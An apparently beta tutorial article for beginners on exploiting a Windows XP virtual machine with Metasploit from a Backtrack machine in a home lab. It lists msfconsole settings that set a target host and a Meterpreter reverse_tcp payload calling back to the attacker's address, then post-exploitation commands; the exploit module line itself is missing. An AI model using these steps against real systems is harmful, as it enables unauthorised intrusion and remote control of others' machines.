This is a beta version of an article by Jordan M. Bonagura. If you have any questions or comments, contact [email protected]
When I decided to write this article, I thought of working with a model without a lot of theory and much more hands-on. The goal is to write for a beginner audience that wants to know how to hack a system but doesn't have any idea how to do it.
I'm sure that usually an article must have all the technical details to prove why it's possible and, more than that, teach what happens in each step, but in this case I chose to write something for that guy who wants to hack for the first time, so that, in my opinion, this guy can be motivated to learn more and more and start to discover a new hacking world.
I have to emphasize here that any kind of test should be performed in your own environment, with your own virtual machines, and always for ethical purposes.
So, let’s talk about our environment:
We'll use 2 different virtual machines that will have the configurations below:
O.S.          IP Address
Windows XP    192.168.0.100
With the right environment, we can go to the next step.
Using the Backtrack machine, we can start the Metasploit application with the msfconsole command.
Before we start to hack, we can look at some interesting commands: for example, the version command in the Metasploit prompt shows the version we are using, and the help command gives some help.
To see the exploits and learn more about each one, you can run the show exploits command inside the Metasploit prompt.
Environment 1 - Windows XP
set RHOST 192.168.0.100
set target 0
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.0.1
After running the exploit there will be an open session where you can type the pwd command and check that you are inside C:\Windows\System32. Another command that can be used is sysinfo, which shows you detailed information about the O.S.
Now that you've learned how to hack Windows XP, you need to go deeper and begin to understand how these exploits really work and how they use technical skills to exploit vulnerabilities. You can try to understand some concepts of computer networks and operating systems too. Remember, only by studying the concepts will you really be able to succeed in your hacking strategies.
In my next article I will show how to exploit a Linux O.S. using Metasploit.